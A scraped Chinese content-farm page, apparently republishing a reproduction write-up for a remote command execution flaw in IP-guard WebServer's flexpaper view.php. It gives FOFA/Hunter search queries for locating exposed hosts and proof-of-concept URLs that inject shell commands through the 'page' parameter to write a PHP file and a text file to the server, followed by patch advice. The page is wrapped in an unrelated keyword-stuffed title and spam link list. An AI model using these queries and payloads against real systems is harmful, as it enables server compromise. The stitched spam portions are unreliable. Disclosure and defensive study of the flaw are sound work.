当前位置: 首页 > news >正文

珠海网站建设 旭洁你知道吗 网站

珠海网站建设 旭洁,你知道吗 网站,简单的html网页,wordpress relocate文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件#xff0c;旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏… 文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏洞RCE的问题是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper使用的这个插件版本存在远程命令执行漏洞新版本已不再使用 flexpaper。 二、影响版本 受影响的范围即有使用文件预览功能的web系统 溢信科技 IP-guard4.81.0307.0三、资产测绘 Fofa语法 appIP-guard Hunter语法 web.titleIP-guard四、漏洞复现 1、来到web访问界面 2、bp抓包修改数据包 poc: /ipg/static/appr/lib/flexpaper/php/view.php?doc1.jpgformatswfisSplittruepage%7C%7Cecho^%3C?phpphpinfo();?^%3E%3Esany.php /ipg/static/appr/lib/flexpaper/php/view.php?doc11.jpgformatswfisSplittruepage||echo123456test.txt/ipg/static/appr/lib/flexpaper/php/test.txt可执行写入的命令可造成重大危害。 五、修复建议 临时防护方案 1.加强系统和网络的访问控制修改防火墙策略不将非必要服务暴露于公网 2.在公网部署的系统通过WAF限制外网对/ipg/static/appr/lib/flexpaper/php/view.php路径的访问 3.定期对服务器上的网站后门文件进行及时查杀。正式防护方案 官方已修复该漏洞建议用户更新到安全版本。 安全版本: IP-guard WebServer 4.81.0307.0 下载链接 https://www.ip-guard.net/
http://www.pierceye.com/news/219427/

相关文章:

  • 成都专业网站制作关于论文网站开发参考文献
  • 免费做代理郑州seo招聘
  • 做网站系统更新后wordpress
  • 兰州网站建站2024免费网站推广
  • 深圳模板建站企业网站出现搜索
  • app开发网站模板该网站正在紧急升级维护中
  • 公众号编辑器365保定seo推广
  • 陕西整站关键词自然排名优化外贸获客渠道有哪些
  • 网站策划需要具备什么福州高端建站
  • 域名注册没有网站美食网页设计素材图片
  • wordpress网站在哪里修改密码ps做网站要求高吗
  • 企业网站带商城源码Audiology wordpress
  • 星月教你做网站东营城乡建设局官网
  • 镇江网站建设开发旺店通erp系统
  • 体育直播网站建设深圳制作小程序
  • 手机微信管理系统搜索引擎优化的流程是什么
  • 壁纸公司网站源码做网站价格表
  • 潜江网站设计商务科技网站建设
  • 合肥企业网站制作网站开发公司简介
  • 德州市建设小学网站文员工作内容
  • 网站域名买卖营销技巧第三季在线观看
  • 西宁市公司网站建设比较网站建设
  • 深圳网站设计公司建设部人才网站
  • 广水住房和城乡建设部网站巅峰网站建设
  • 建设智能家居网站SWOT分析商业网站有哪些
  • 相亲网站男人拉我做外汇h5特效网站欣赏
  • 网站一个多少钱有什么做同城的网站
  • 网站 改版 方案wordpress谷歌字体 4.9
  • 全网引流推广 价格网站百度关键词seo排名优化
  • 信用门户网站建设规范win7 iis 发布asp.net网站